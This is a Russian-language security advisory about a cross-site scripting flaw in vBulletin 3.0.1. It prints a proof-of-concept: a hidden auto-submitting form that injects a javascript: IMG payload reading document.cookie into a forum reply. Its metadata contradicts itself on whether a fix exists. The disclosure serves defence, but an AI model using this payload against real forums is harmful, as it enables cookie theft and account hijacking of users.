Межсайтовое выполнение сценариев в vBulletin

Дата публикации:
26.06.2004
Дата изменения:
17.10.2006
Всего просмотров:
2706
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
vBulletin 3.x
Уязвимые версии: vBulletin 3.0.1

Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

Пример/Эксплоит:

<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;

URL производителя: http://www.vbulletin.com/

Решение: На данный момент решение не существует.

Ссылки: vBulletin HTML Injection Vulnerability

или введите имя

CAPTCHA